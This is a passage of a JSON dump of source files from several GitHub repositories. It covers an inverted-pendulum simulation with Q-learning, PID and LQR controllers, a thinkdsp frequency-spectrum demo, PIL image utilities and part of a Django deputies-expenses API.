[s[0] for s in states]\n thetas = [s[2] for s in states]\n last_thetas = thetas[-int(self.last_n/plot_resolution):]\n last_xs = xs[-int(self.last_n/plot_resolution):]\n\n theta_std = np.std(last_thetas)\n x_std = np.std(last_xs)\n if theta_std < 0.1 and xs[-1] < 50 and (last_stable == 0 or i - last_stable > self.last_n):\n lines.append( (i / plot_resolution, 'b') )\n 
last_stable = i\n survival_time = 0\n state = self.simulator.random_state(state)\n\n theta = state[2]\n if theta <= pi / 2 or theta >= 3 * pi / 2:\n lines.append( (i / plot_resolution, 'r') )\n state = self.simulator.random_state(state)\n survival_time = 0\n \n q_state = [state[0], state[1], state[2] + pi, state[3]]\n\n action = self.controller.action(q_state)\n force = self.max_force * action[1]\n state = self.simulator.simulate_step(state, force, self.dt)\n\n next_q_state = [state[0], state[1], state[2] + pi, state[3]]\n\n reward = 5\n if abs(pi - state[2]) >= 0.1:\n reward = -30 * ( abs(pi - state[2]) ** 2 )\n \n if abs(state[0]) >= 15:\n reward -= abs(state[0]) ** 1.5\n\n self.controller.update(q_state, action[0], next_q_state, reward)\n\n if i > 0 and i % (plot_n - 1) == 0:\n x_ax.plot([s[0] for s in states], color='g')\n theta_ax.plot([s[2] for s in states], color='r')\n\n cart_ax.lines = []\n cart_width = 10\n cart_height = 0.5\n factor = 2\n r = 1\n\n cart_ax.axis([-factor * cart_width, factor * cart_width, 0, factor * cart_width])\n L = 6 * cart_height\n L_discount = (L + L * sin(pi/2 - state[2]) ** 2)\n cart_ax.plot([state[0], state[0] - L_discount * cos(pi/2 - state[2])], \n [1.5 * cart_height, 1.5 * cart_height - L_discount * sin(pi/2 - state[2])],\n color='b', \n solid_capstyle=\"round\",\n linewidth=2)\n\n plt.pause(0.000001)\n\n if i % 10 == 0:\n print(i)" }, { "alpha_fraction": 0.49990010261535645, "alphanum_fraction": 0.5190809369087219, "avg_line_length": 34.24647903442383, "blob_id": "1c8381e71fb4925209e065deb9cb0c18aa00d545", "content_id": "7452a410153a62c8c3457c29c42121140f09327c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5005, "license_type": "no_license", "max_line_length": 117, "num_lines": 142, "path": "/inverted_pendulum (1)/inverted_pendulum/qlearning/qlearning.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "import random\nfrom math import 
pi\nimport numpy as np\nfrom ..fuzzy.fuzzy_controller import get_controller\n\n\nclass QLearning:\n def __init__(self, max_theta, max_dtheta, max_x, max_dx, n_theta, n_dtheta, n_x, n_dx, n_action, is_fuzzy=False):\n self.init_constants()\n\n self.max_theta = max_theta\n self.max_dtheta = max_dtheta\n self.max_x = max_x\n self.max_dx = max_dx\n self.n_action = n_action\n self.n_theta = n_theta\n self.n_dheta = n_dtheta\n self.n_x = n_x\n self.n_dx = n_dx\n self.n_action = n_action\n \n shape = ( n_x, n_dx, n_theta, n_dtheta, n_action )\n\n self.Q = self.initial_Q * np.ones(shape, dtype=float)\n if is_fuzzy:\n self.init_fuzzy()\n\n def init_constants(self):\n self.initial_Q = 0\n self.initial_fuzzy_Q = 2\n self.visits = {}\n\n def init_fuzzy(self):\n print(\"Generating fuzzy table\")\n ctrl = get_controller()\n\n for i in range( self.Q.shape[2] ):\n if i % 10 == 0:\n print(\"Generating row \", i, \" of \", self.Q.shape[0], \" rows for Q table\")\n for j in range(self.Q.shape[3]):\n _, _, theta, dtheta = self.denormalize_state( (0, 0, i, j) )\n print(\"\\t\", theta, dtheta)\n original_action = ctrl.output({'theta': theta, 'dtheta': dtheta})['force']\n normalized_action = self.normalize_action(original_action)\n\n for a in range(self.Q.shape[0]):\n for b in range(self.Q.shape[1]):\n self.Q[(a, b,i, j, normalized_action)] = self.initial_fuzzy_Q\n\n def normalize_state(self, state):\n first = int( (state[2]) / ( 2.0 * self.max_theta ) * self.Q.shape[2] )\n second = int( (state[3] + self.max_dtheta) / ( 2.0 * self.max_dtheta ) * self.Q.shape[3] )\n third = int( (state[0] + self.max_x) / ( 2.0 * self.max_x ) * self.Q.shape[0] )\n fourth = int( (state[1] + self.max_dx) / ( 2.0 * self.max_dx ) * self.Q.shape[1] )\n\n return ( third, fourth, first, second )\n\n def denormalize_state(self, state):\n first = (float(state[2]) / self.Q.shape[2] * 2.0 * self.max_theta)\n second = (float(state[3]) / self.Q.shape[3] * 2.0 * self.max_dtheta - self.max_dtheta)\n third = 
(float(state[0]) / self.Q.shape[0] * 2.0 * self.max_x - self.max_x)\n fourth = (float(state[1]) / self.Q.shape[1] * 2.0 * self.max_dx - self.max_dx)\n\n return ( third, fourth, first, second )\n\n def denormalize_action(self, action):\n half = (self.n_action - 1) / 2\n if action == half:\n return 0\n else:\n return 2 / (self.n_action - 1) * (action - half)\n\n def sgn(self, x):\n if x >= 0:\n return 1\n else: \n return -1\n\n def normalize_action(self, action):\n if abs(action) < 0.0001:\n return int( (self.n_action - 1) / 2 )\n else:\n return int( (self.n_action - 1) / 2 + action / (2 / (self.n_action - 1) ) )\n\n def action(self, state, k = 3):\n state = self.normalize_state(state)\n\n actions = self.Q[state]\n\n normalization_factor = None\n minimal_action = min(actions)\n if minimal_action < 0:\n normalization_factor = -minimal_action\n else:\n normalization_factor = 0\n\n actions = [ (i, actions[i]) for i in range(len(actions)) ]\n max_action = max(actions, key=lambda x: x[1])\n return max_action[0], self.denormalize_action(max_action[0])\n\n probabilities = []\n total = 0\n for a in range( len(actions) ):\n curr_probability = k ** ( self.Q[ tuple( list(state) + [a] ) ] + normalization_factor )\n probabilities.append(total + curr_probability)\n total = total + curr_probability\n\n probabilities = [p / total for p in probabilities]\n\n chance = random.random()\n for i in range(len(probabilities)):\n if chance < probabilities[i]:\n return i, self.denormalize_action(i)\n\n def update(self, s, a, next_s, r, gamma = 0.7, alpha=1):\n\n if tuple(list(s) + [a]) not in self.visits:\n self.visits[ tuple(list(s) + [a]) ] = 1\n else:\n self.visits[ tuple(list(s) + [a]) ] += 1\n \n alpha = 1\n \n s = self.normalize_state(s)\n next_s = self.normalize_state(next_s)\n\n max_action = max( list(self.Q[ tuple(next_s) ]) )\n self.Q[ tuple( list(s) + [a] ) ] = self.Q[ tuple( list(s) + [a] ) ] + \\\n alpha * ( r + gamma * max_action - self.Q[ tuple(list(s) + [a]) ])\n\nif __name__ 
== \"__main__\":\n q = QLearning(89*pi / 180, 100, 100, 100, 200)\n\n q_str = \"\"\n for i in range( q.Q.shape[0] ):\n for j in range(q.Q.shape[0]):\n for k in range(q.Q.shape[0]):\n q_str += str( q.Q[ (i, j, k) ] ) + \" \"\n q_str += \"\\n\"\n q_str += \"\\n\"\n\n print(q_str)\n" }, { "alpha_fraction": 0.386682391166687, "alphanum_fraction": 0.5418796539306641, "avg_line_length": 36.49140167236328, "blob_id": "42085fd3229118ad57539a201626c35c2690fcd9", "content_id": "c5c8a6bd950bc94851e3f67804ceabd6ac13c8e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15462, "license_type": "no_license", "max_line_length": 92, "num_lines": 407, "path": "/inverted_pendulum (1)/pendulum.py", "repo_name": "koles161rus/invertedPendulum", "src_encoding": "UTF-8", "text": "from math import *\nfrom numpy import *\nimport pygame\nimport numpy as np\nimport control.matlab\nfrom main import InvertedPendulumBalancer\n\n\ndt = 0.01\ng = 9.81\nl = 1.0\nm = 1.0\n\nglobal k1, k2, k3\nk1 = 500000\nk2 = 10000\nk3 = 10000\n\nglobal q1, q2, q3, q4, r\nq1 = 0.001\nq2 = 0.001\nq3 = 1000000000\nq4 = 20000000\nr = 0.005\n\nclock = pygame.time.Clock()\npygame.init()\nsize = (width, height) = (1800, 1000)\nscreen = pygame.display.set_mode(size)\n\n\nclass Pendulum:\n def __init__(self, x0, y0, phi0):\n self.phi0 = phi0\n self.phi = phi0\n self.velocity = 0\n self.x0 = x0\n self.y0 = y0\n self.x0_vel = 0\n self.x = x0 + 250.0 * sin(phi0)\n self.y = y0 + 250.0 * cos(phi0)\n\n self.t = dt\n self.t = np.arange(0, 30, 0.01)\n\n self.phi_chart_t = 20\n self.phi_chart = [(self.phi_chart_t, 820)]\n\n self.x_chart_t = 20\n self.x_chart = [(self.x_chart_t, 480)]\n\n def move(self, control):\n self.phi = atan2(self.x - self.x0, self.y - self.y0)\n d_velocity = -g * sin(self.phi) * dt / l\n self.velocity += d_velocity\n d_phi = dt * self.velocity\n self.phi += d_phi\n self.x = self.x0 + 250.0 * sin(self.phi)\n self.y = self.y0 + 250.0 * cos(self.phi)\n\n 
d_x0_vel = dt * control\n self.x0_vel += d_x0_vel\n dx0 = dt * self.x0_vel\n self.x0 += dx0\n\n def draw(self):\n pygame.draw.circle(screen, (0, 0, 0), [int(self.x0), int(self.y0)], 5)\n pygame.draw.line(screen, (0, 0, 0), [self.x0, self.y0], [self.x, self.y], 2)\n pygame.draw.circle(screen, (255, 0, 0), [int(self.x), int(self.y)], 10)\n pygame.draw.line(screen, (0, 0, 0), [0, self.y0], [1800, self.y0], 3)\n\n self.phi_chart_t += 0.2\n if self.phi_chart_t > size[0]:\n self.phi_chart_t = 0\n self.phi_chart = [(self.phi_chart_t, 820)]\n angle = np.pi - self.phi if self.phi > 0 else -np.pi - self.phi\n self.phi_chart.append((self.phi_chart_t, 300 * angle + 820))\n pygame.draw.lines(screen, (255, 0, 0), False, self.phi_chart, 3)\n pygame.draw.line(screen, (0, 0, 0), [20, 820], [1780, 820], 2)\n pygame.draw.line(screen, (0, 0, 0), [20, 660], [20, 980], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 665], [1780, 665], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 975], [1780, 975], 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((18, 660), (20, 650), (22, 660)), 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((1770, 822), (1780, 820), (1770, 818)), 2)\n print(self.phi)\n\n self.x_chart_t += 0.2\n if self.x_chart_t > size[0]:\n self.x_chart_t = 0\n self.x = [(self.x_chart_t, 480)]\n move = self.x\n self.x_chart.append((self.x_chart_t, -0.2 * move + 683))\n pygame.draw.lines(screen, (0, 255, 0), False, self.x_chart, 3)\n pygame.draw.line(screen, (0, 0, 0), [20, 480], [1780, 480], 2)\n pygame.draw.line(screen, (0, 0, 0), [20, 620], [20, 340], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 345], [1780, 345], 2)\n pygame.draw.line(screen, (128, 128, 128), [20, 615], [1780, 615], 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((18, 340), (20, 330), (22, 340)), 2)\n pygame.draw.polygon(screen, (0, 0, 0), ((1770, 482), (1780, 480), (1770, 478)), 2)\n print(self.x)\n\n\nclass PID:\n def __init__(self, k1, k2, k3, pendulum):\n self.k1 = k1\n self.k2 = k2\n self.k3 = k3\n 
self.p = pendulum\n self.error = pi - self.p.phi\n self.derivative = 0\n self.integral = 0\n\n def update(self):\n self.k1 = k1\n self.k2 = k2\n self.k3 = k3\n\n tmp = self.error\n self.error = copysign(1, p.phi) * (pi - abs(self.p.phi)) + (self.p.x0 - 600) / 10000\n diff = self.error - tmp\n self.derivative = diff / dt\n self.integral += tmp\n\n def output(self):\n return self.k1 * self.error + self.k2 * self.derivative + self.k3 * self.integral\n\n\nclass LQR:\n def __init__(self, q1, q2, q3, q4, r, pendulum):\n self.q1 = q1\n self.q2 = q2\n self.q3 = q3\n self.q4 = q4\n self.p = pendulum\n self.A = matrix([[0, 1, 0, 0], [0, 0, -g, 0], [0, 0, 0, 1], [0, 0, 2 * g, 0]])\n self.B = matrix([[0], [1], [0], [-1]])\n self.Q = diag([q1, q2, q3, q4])\n self.R = r\n self.K = control.matlab.lqr(self.A, self.B, self.Q, self.R)[0]\n print(self.K)\n\n def update(self):\n self.q1 = q1\n self.q2 = q2\n self.q3 = q3\n self.q4 = q4\n self.Q = diag([q1, q2, q3, q4])\n self.K = control.matlab.lqr(self.A, self.B, self.Q, self.R)[0]\n\n def output(self):\n X = matrix([[-(self.p.x0 - 600) / 10], [self.p.x0_vel / 10],\n [copysign(1, self.p.phi) * (-pi + abs(self.p.phi))], [self.p.velocity]])\n U = self.K * X\n return U.flat[0]\n\n\nclass DrawPID:\n def draw_text(self):\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Пропорциональный коэффициент: %d\" % k1, 1, (255, 0, 0))\n screen.blit(label1, (100, 400))\n label2 = myfont.render(\"Дифференциальный коэффициент: %d\" % k2, 1, (255, 0, 0))\n screen.blit(label2, (100, 420))\n label3 = myfont.render(\"Интегральный коэффициент: %.1f\" % k3, 1, (255, 0, 0))\n screen.blit(label3, (100, 440))\n\n\n def make_buttons(k1, k2, k3, pid, pend):\n pygame.draw.rect(screen, (0, 0, 255), [420, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), 
[420, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 440, 90, 15])\n\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Повысить\", 1, (255, 255, 255))\n label2 = myfont.render(\"Понизить\", 1, (255, 255, 255))\n screen.blit(label1, (420, 400))\n screen.blit(label2, (520, 400))\n screen.blit(label1, (420, 420))\n screen.blit(label2, (520, 420))\n screen.blit(label1, (420, 440))\n screen.blit(label2, (520, 440))\n\n if pygame.mouse.get_pressed()[0]:\n (pos1, pos2) = pygame.mouse.get_pos()\n if 420 <= pos1 <= 510 and 400 <= pos2 <= 415:\n k1 += 10\n elif 520 <= pos1 <= 610 and 400 <= pos2 <= 415:\n k1 -= 10\n elif 420 <= pos1 <= 510 and 420 <= pos2 <= 435:\n k2 += 1\n elif 520 <= pos1 <= 610 and 420 <= pos2 <= 435:\n k2 -= 1\n elif 420 <= pos1 <= 510 and 440 <= pos2 <= 455:\n k3 += 0.1\n elif 520 <= pos1 <= 610 and 440 <= pos2 <= 455:\n k3 -= 0.1\n\n return k1, k2, k3\n\n\nclass DrawLQR:\n def draw_text(self):\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Параметр положения тележки: %.5f\" % q1, 1, (255, 0, 0))\n screen.blit(label1, (50, 400))\n label2 = myfont.render(\"Параметр скорости тележки: %.5f\" % q2, 1, (255, 0, 0))\n screen.blit(label2, (50, 420))\n label3 = myfont.render(\"Параметр углового положения: %.1f\" % q3, 1, (255, 0, 0))\n screen.blit(label3, (50, 440))\n label3 = myfont.render(\"Параметр угловой скорости: %.1f\" % q4, 1, (255, 0, 0))\n screen.blit(label3, (50, 460))\n\n\n def make_buttons(q1, q2, q3, q4, lqr, pend):\n pygame.draw.rect(screen, (0, 0, 255), [420, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 400, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 420, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 440, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [420, 460, 90, 15])\n pygame.draw.rect(screen, (0, 0, 255), [520, 460, 
90, 15])\n\n myfont = pygame.font.SysFont(\"monospace\", 15)\n label1 = myfont.render(\"Повысить\", 1, (255, 255, 255))\n label2 = myfont.render(\"Понизить\", 1, (255, 255, 255))\n screen.blit(label1, (420, 400))\n screen.blit(label2, (520, 400))\n screen.blit(label1, (420, 420))\n screen.blit(label2, (520, 420))\n screen.blit(label1, (420, 440))\n screen.blit(label2, (520, 440))\n screen.blit(label1, (420, 460))\n screen.blit(label2, (520, 460))\n\n if (pygame.mouse.get_pressed()[0]):\n (pos1, pos2) = pygame.mouse.get_pos()\n if 420 <= pos1 <= 510 and 400 <= pos2 <= 415:\n q1 += 0.001\n elif 520 <= pos1 <= 610 and 400 <= pos2 <= 415:\n q1 -= 0.001\n if q1 < 0.001: q1 += 0.001\n elif 420 <= pos1 <= 510 and 420 <= pos2 <= 435:\n q2 += 0.001\n elif 520 <= pos1 <= 610 and 420 <= pos2 <= 435:\n q2 -= 0.001\n elif 420 <= pos1 <= 510 and 440 <= pos2 <= 455:\n q3 += 1000\n elif 520 <= pos1 <= 610 and 440 <= pos2 <= 455:\n q3 -= 1000\n elif 420 <= pos1 <= 510 and 460 <= pos2 <= 475:\n q4 += 10\n elif 520 <= pos1 <= 610 and 460 <= pos2 <= 475:\n q4 -= 10\n\n return q1, q2, q3, q4\n\n\ndef draw_designation():\n myfont = pygame.font.SysFont(\"monospace\", 20)\n label1 = myfont.render(\"X\", 1, (128, 128, 128))\n screen.blit(label1, (5, 470))\n label2 = myfont.render(\"PHI\", 1, (128, 128, 128))\n screen.blit(label2, (0, 640))\n label3 = myfont.render(\"I\", 1, (128, 128, 128))\n screen.blit(label3, (1785, 820))\n screen.blit(label3, (1785, 550))\n label4 = myfont.render(\"PI/3\", 1, (128, 128, 128))\n screen.blit(label4, (25, 665))\n label5 = myfont.render(\"0\", 1, (128, 128, 128))\n screen.blit(label5, (20, 820))\n screen.blit(label5, (20, 480))\n label6 = myfont.render(\"-PI/3\", 1, (128, 128, 128))\n screen.blit(label6, (20, 955))\n label7 = myfont.render(\"550\", 1, (128, 128, 128))\n screen.blit(label7, (25, 345))\n label8 = myfont.render(\"-550\", 1, (128, 128, 128))\n screen.blit(label8, (20, 600))\n #label9 = myfont.render(\"100\", 1, (128, 128, 128))\n 
#screen.blit(label9, (70, 820))\n #screen.blit(label9, (70, 480))\n label10 = myfont.render(\"100\", 1, (128, 128, 128))\n screen.blit(label10, (135, 820))\n screen.blit(label10, (135, 480))\n #label11 = myfont.render(\"300\", 1, (128, 128, 128))\n #screen.blit(label11, (198, 820))\n #screen.blit(label11, (198, 480))\n label12 = myfont.render(\"200\", 1, (128, 128, 128))\n screen.blit(label12, (260, 820))\n screen.blit(label12, (260, 480))\n #label13 = myfont.render(\"500\", 1, (128, 128, 128))\n #screen.blit(label13, (322, 820))\n #screen.blit(label13, (322, 550))\n label14 = myfont.render(\"300\", 1, (128, 128, 128))\n screen.blit(label14, (385, 820))\n screen.blit(label14, (385, 480))\n #label15 = myfont.render(\"700\", 1, (128, 128, 128))\n #screen.blit(label15, (447, 820))\n #screen.blit(label15, (447, 550))\n label16 = myfont.render(\"400\", 1, (128, 128, 128))\n screen.blit(label16, (510, 820))\n screen.blit(label16, (510, 480))\n #label17 = myfont.render(\"900\", 1, (128, 128, 128))\n #screen.blit(label17, (572, 820))\n #screen.blit(label17, (572, 550))\n label18 = myfont.render(\"500\", 1, (128, 128, 128))\n screen.blit(label18, (635, 820))\n screen.blit(label18, (635, 480))\n #label19 = myfont.render(\"1100\", 1, (128, 128, 128))\n #screen.blit(label19, (697, 820))\n #screen.blit(label19, (697, 550))\n label20 = myfont.render(\"600\", 1, (128, 128, 128))\n screen.blit(label20, (760, 820))\n screen.blit(label20, (760, 480))\n #label21 = myfont.render(\"1300\", 1, (128, 128, 128))\n #screen.blit(label21, (822, 820))\n #screen.blit(label21, (822, 550))\n label22 = myfont.render(\"700\", 1, (128, 128, 128))\n screen.blit(label22, (885, 820))\n screen.blit(label22, (885, 480))\n #label23 = myfont.render(\"1500\", 1, (128, 128, 128))\n #screen.blit(label23, (947, 820))\n #screen.blit(label23, (947, 550))\n label24 = myfont.render(\"800\", 1, (128, 128, 128))\n screen.blit(label24, (1010, 820))\n screen.blit(label24, (1010, 480))\n #label25 = 
myfont.render(\"1700\", 1, (128, 128, 128))\n #screen.blit(label25, (1072, 820))\n #screen.blit(label25, (1072, 550))\n label26 = myfont.render(\"900\", 1, (128, 128, 128))\n screen.blit(label26, (1135, 820))\n screen.blit(label26, (1135, 480))\n #label27 = myfont.render(\"1900\", 1, (128, 128, 128))\n #screen.blit(label27, (1197, 820))\n #screen.blit(label27, (1197, 550))\n label28 = myfont.render(\"1000\", 1, (128, 128, 128))\n screen.blit(label28, (1260, 820))\n screen.blit(label28, (1260, 480))\n #label29 = myfont.render(\"2100\", 1, (128, 128, 128))\n #screen.blit(label29, (1322, 820))\n #screen.blit(label29, (1322, 550))\n label30 = myfont.render(\"1100\", 1, (128, 128, 128))\n screen.blit(label30, (1385, 820))\n screen.blit(label30, (1385, 480))\n #label31 = myfont.render(\"2300\", 1, (128, 128, 128))\n #screen.blit(label31, (1447, 820))\n #screen.blit(label31, (1447, 550))\n label32 = myfont.render(\"1200\", 1, (128, 128, 128))\n screen.blit(label32, (1510, 820))\n screen.blit(label32, (1510, 480))\n #label33 = myfont.render(\"2500\", 1, (128, 128, 128))\n #screen.blit(label33, (1572, 820))\n #screen.blit(label33, (1572, 550))\n label34 = myfont.render(\"1300\", 1, (128, 128, 128))\n screen.blit(label34, (1635, 820))\n screen.blit(label34, (1635, 480))\n #label35 = myfont.render(\"2700\", 1, (128, 128, 128))\n #screen.blit(label35, (1697, 820))\n #screen.blit(label35, (1697, 550))\n\n\np = Pendulum(900, 300, pi - 30*pi / 180)\npid = PID(k1, k2, k3, p)\nlqr = LQR(q1, q2, q3, q4, r, p)\n\nwhile 1:\n screen.fill((255, 255, 255))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_1:\n pid.update()\n p.move(pid.output())\n #DrawPID.draw_text(DrawPID)\n #(k1, k2, k3) = DrawPID.make_buttons(k1, k2, k3, pid, p)\n if event.key == pygame.K_2:\n lqr.update()\n p.move(lqr.output())\n #DrawLQR.draw_text(DrawLQR)\n #(q1, q2, q3, q4) = DrawLQR.make_buttons(q1, q2, q3, q4, lqr, p)\n 
if event.key == pygame.K_3:\n balancer = InvertedPendulumBalancer()\n balancer.run()\n\n pygame.event.set_blocked(pygame.MOUSEMOTION)\n pygame.event.set_blocked(pygame.MOUSEBUTTONUP)\n pygame.event.set_blocked(pygame.MOUSEBUTTONDOWN)\n pygame.event.set_blocked(pygame.ACTIVEEVENT)\n\n\n #pid.update()\n #lqr.update()\n #p.move(pid.output())\n #p.move(lqr.output())\n p.draw()\n #DrawPID.draw_text(DrawPID)\n #DrawLQR.draw_text(DrawLQR)\n draw_designation()\n #(k1, k2, k3) = DrawPID.make_buttons(k1, k2, k3, pid)\n #(q1, q2, q3, q4) = DrawLQR.make_buttons(q1, q2, q3, q4, lqr, p)\n\n clock.tick(60)\n pygame.display.flip()" } ]
5
rubenbc7/Frecuencia-Fourier
https://github.com/rubenbc7/Frecuencia-Fourier
a1182de72c8d2a04a47e5de552c48896daccff21
e64214b87470fb6747b02dc2ca89fc7f7fb541a2
dc0690f78b2692a969f390211c20c0c363d4e8ea
refs/heads/master
2022-12-18T00:43:02.997193
2020-09-15T05:23:55
2020-09-15T05:23:55
295,622,887
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7235772609710693, "alphanum_fraction": 0.7621951103210449, "avg_line_length": 22.4761905670166, "blob_id": "f03cd42b1e514b37c7f142b0f47e5e5f8cdad489", "content_id": "b3ff190d2db5b7f6f082b1090b3397c3dd28d97b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 67, "num_lines": 21, "path": "/frecuencia.py", "repo_name": "rubenbc7/Frecuencia-Fourier", "src_encoding": "UTF-8", "text": "import sys\nsys.path.insert(1,'dsp-modulo')\n\nfrom thinkdsp import SinSignal\nfrom thinkdsp import decorate\nimport thinkplot\n\nsenalUno = SinSignal (freq=380, amp=0.1, offset=0)\nsenalDos = SinSignal(freq=200, amp=1, offset=0)\n\nmezcla = senalUno + senalDos\nwaveMezcla = mezcla.make_wave(duration=1, start=0, framerate=44100)\nwaveMezcla.plot()\n\ndecorate(xlabel=\"Timepo (s)\")\nthinkplot.show()\n\nespectro = waveMezcla.make_spectrum()\nespectro.plot()\ndecorate(xlabel=\"Frecuencia (Hz)\")\nthinkplot.show()" } ]
1
gattonic/python-image-operations
https://github.com/gattonic/python-image-operations
a3edc16d7007c4daa4c9d298ff101cd9e7f55249
4e6f09d872051cfea8046d3c04975c649e105e8d
1fdcf97aefcb82f0877a421c31cc91345404df5a
refs/heads/master
2021-01-16T19:36:47.387107
2017-08-13T14:17:33
2017-08-13T14:17:33
100,181,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8399999737739563, "alphanum_fraction": 0.8399999737739563, "avg_line_length": 25, "blob_id": "330812d8e479f243e264df67539ee8d98eda31a2", "content_id": "41d9632edb1805e149406e89af33218e92f89458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 25, "num_lines": 1, "path": "/README.md", "repo_name": "gattonic/python-image-operations", "src_encoding": "UTF-8", "text": "# python-image-operations" }, { "alpha_fraction": 0.6537376642227173, "alphanum_fraction": 0.6629055142402649, "avg_line_length": 30.488889694213867, "blob_id": "2cf37347ef0169754a328ba6c91e110d5221a067", "content_id": "5b15e9d74b3b1d5d749769ef1723eba911b7c3ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 92, "num_lines": 45, "path": "/image_operations.py", "repo_name": "gattonic/python-image-operations", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport numpy as np\n\n\ndef load_greyscale(image, return_as_array=True, show_image=False, save_image=False):\n img = Image.open(image)\n img = img.convert('L')\n\n return __option_routine(img, return_as_array, show_image, save_image)\n\n\ndef load_binary(image, threshold, return_as_array=True, show_image=False, save_image=False):\n img = load_greyscale(image, return_as_array=False)\n (width, height) = img.size\n img_pixel_map = img.load()\n\n binary_img = Image.new('1', img.size)\n binary_img_pixel_map = binary_img.load()\n\n for x in range(0, width):\n for y in range(0, height):\n binary_img_pixel_map[x,y] = 1 if img_pixel_map[x,y] >= threshold else 0\n\n return __option_routine(binary_img, return_as_array, show_image, save_image)\n\n\ndef gamma_correction(img, gamma, return_as_array=True, show_image=False, save_image=False):\n img_array = np.asarray(img)\n img_corrected_array = 255 * 
((img_array/255) ** (1/gamma))\n img_corrected_array = np.uint8(img_corrected_array)\n img_corrected = Image.fromarray(img_corrected_array, img.mode)\n return __option_routine(img_corrected, return_as_array, show_image, save_image)\n\n\ndef __option_routine(img, return_as_array, show_image, save_image):\n if show_image:\n img.show()\n\n if save_image:\n img.save(img + \".jpg\")\n\n if return_as_array:\n img = np.asarray(img)\n\n return img\n\n" } ]
2
labcodes/dados_brasil_io
https://github.com/labcodes/dados_brasil_io
8286946577248b65d7e1ddb375c4dd8fc208f0d1
4f1cc3daa3465b03e927edbc4e845d71281b26a0
227725944927b2311be5243dbc92d770c7061007
refs/heads/master
2022-12-10T06:20:51.003603
2019-10-29T13:42:51
2019-10-29T13:42:51
132,934,926
7
0
null
2018-05-10T17:44:50
2020-01-21T21:03:57
2022-01-21T19:10:46
Python
[ { "alpha_fraction": 0.6439655423164368, "alphanum_fraction": 0.6448276042938232, "avg_line_length": 26.619047164916992, "blob_id": "b9e63517616baaf80bbd68c5d2bef90e6cd5151f", "content_id": "247dad441771a3ac6540f06ae88c07fc7139f7e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1160, "license_type": "no_license", "max_line_length": 73, "num_lines": 42, "path": "/politicos/views.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from datetime import date\nfrom rest_framework import generics, serializers\nfrom rest_framework.response import Response\n\nfrom politicos.models import Deputado, GastoCotaParlamentar\n\n\nclass GastoCotaParlamentarSerializer(serializers.ModelSerializer):\n class Meta:\n model = GastoCotaParlamentar\n fields = '__all__'\n\n\nclass DeputadoSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Deputado\n fields = [\n 'id', 'nome', 'partido', 'uf', 'id_legislatura',\n 'gastos'\n ]\n depth = 2\n\n\nclass DeputadoListView(generics.ListAPIView):\n serializer_class = DeputadoSerializer\n\n def get_queryset(self):\n queryset = Deputado.objects.all().select_related('partido', 'uf')\n\n hoje = date.today()\n filtros = self.request.query_params.dict()\n filtros.setdefault('gastos_mes', hoje.month)\n filtros.setdefault('gastos_ano', hoje.year)\n\n queryset = queryset.prefetch_gastos(**{\n campo.replace('gastos_', ''): valor\n for campo, valor in filtros.items()\n if campo.startswith('gastos_')\n })\n\n return queryset\n" }, { "alpha_fraction": 0.5182795524597168, "alphanum_fraction": 0.5591397881507874, "avg_line_length": 21.14285659790039, "blob_id": "0a0558e6e9971caa6b7d5f6ed0e7769b767f7376", "content_id": "17697defd2c727bc51e83a07dbcb3025c070fbe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 93, "num_lines": 21, "path": 
